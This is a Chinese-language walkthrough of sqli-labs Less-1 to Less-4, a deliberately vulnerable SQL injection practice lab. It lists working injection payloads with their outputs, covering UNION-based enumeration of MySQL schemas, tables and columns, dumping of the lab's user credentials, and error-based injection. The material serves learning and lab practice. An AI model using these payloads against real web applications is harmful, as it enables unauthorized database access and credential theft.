简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。
描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。
前面的话:操作学习的环境----Linux环境+docker+sqli-labs。环境配置请看:第一章:SQL注入基础--1.1Web应用架构分析&1.2 SQLi注入环境搭建或私信我亲测有效的资源给你。
Tips:这些都是作者学习过的内容,文字、思维导图等都是一双手,后续会连载这系列以及丰富流程说明,欢迎沟通交流、留言,觉得必要的也可收藏关注
1、概要:
sqli-labs通关
Less-1源代码(id字符型):
$sql="SELECT*FROM users WHERE id='$id'LIMIT 0,1";
Less-2源代码(id数值型):
$sql="SELECT*FROM users WHERE id=$id LIMIT 0,1";
Less-3(需闭合括号及注释)
$sql="SELECT*FROM users WHERE id=("$id")LIMIT 0,1";
Less-4(需闭合括号及注释)
$id=".$id.";
$sql="SELECT*FROM users WHERE id=($id)LIMIT 0,1";
其他:注入步骤(理清思路事半功倍,详细内容可通过链接查看文章)
1.5 SQL注入流程:介绍--目标收集,SQL注入的识别,信息收集,数据获取(查库查表查数据),提权
1.6 SQL手工注入方法:重要--MySQL手工注入方法--查询数据核心语法:
查库select schema_name from information_schema.schemata
查表select table_name from information_schema.tables where table_schema=库名
查列select column_name from information_schema.columns where table_name=表名
查数据select 列名from库名.表名
2、详细的思维导图:
3、详细的解说:
Less-1(结合sqli-labs的Less-1,实操)
源代码(id字符型):$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
?id=1
返回:Your Login name:Dumb
?id=1'
返回:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
?id=1' and '1' = '1
返回:正常
?id=1' and '1' = '2
返回:不正常-说明应该存在注入
?id=1' order by 3--+
--+注释掉原语句中的单引号’
发现数据为3列(因为4会报错)
?id=-1' union select 1,2,3--+
发现2,3可以注入
?id=-1' union select 1,2,(select version())--+
查看下版本信息
?id=-1' union select 1,2,(select schema_name from information_schema.schemata)--+
查库:发现提示数据超过一行
Subquery returns more than 1 row
?id=-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+
查库:使用group_concat()成功查询出结果
返回:Your Password:information_schema,challenges,mysql,performance_schema,security
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
查表
返回:Your Password:emails,referers,uagents,users
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)--+
查列:name可以转换Hex
返回:Your Password:id,username,password
?id=-1' union select 1,2,(select group_concat(username,password) from users)--+
查数据
返回: Your Password:DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4
?id=-1' union select 1,2,(select group_concat(concat_ws('~',username,password) )from users)--+
规范数据
返回:Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2
?id=-1' union select 1,2,(select concat_ws('~',username,password) from users limit 0,1)--+
一行行读数据:limit
?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e,floor(rand(0)*2)))--+
报错注入floor()
?id=1' and (select extractvalue(1,concat(0x7,(select concat(0x7,username,password) from users limit 0,1),0x7e)))--+
报错注入extractvalue()
Less-2
源代码(id数值型,直接注入即可):$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
?id=1 and 1=1
Your Login name:Dumb
?id=1 and 1=2
无
?id=1 order by 3
Your Login name:Dumb
Your Password:Dumb
?id=-1 union select 1,2,3
Your Login name:2
Your Password:3
?id=-1 union select 1,2,(select schema_name from information_schema.schemata limit 4,1)
查库
Your Password:security
?id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)
查表
Your Password:users
?id=-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users' )
查列
Your Password:id,username,password
?id=-1 union select 1,2,(select group_concat(concat_ws('~',username,password) )from users)
查数据
Dumb~Dumb
Angelina~I-kill-you
Dummy~p@ssword
secure~crappy
stupid~stupidity
superman~genious
batman~mob!le
admin~admin
admin1~admin1
。。。
Less-3(闭合括号及注释,直接注入即可)
需闭合括号及注释
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
?id=3') AND ('1'='1
Your Password:p@ssword
?id=3') AND ('1'='2
错误
?id=3') order by 3--+
?id=-3') union select 1,2,(select schema_name from information_schema.schemata limit 4,1)--+
查库
Your Password:security
查表、查列、查数据略
Less-4(id后加")即可)
$id = '"' . $id . '"';$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
?id=1"
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1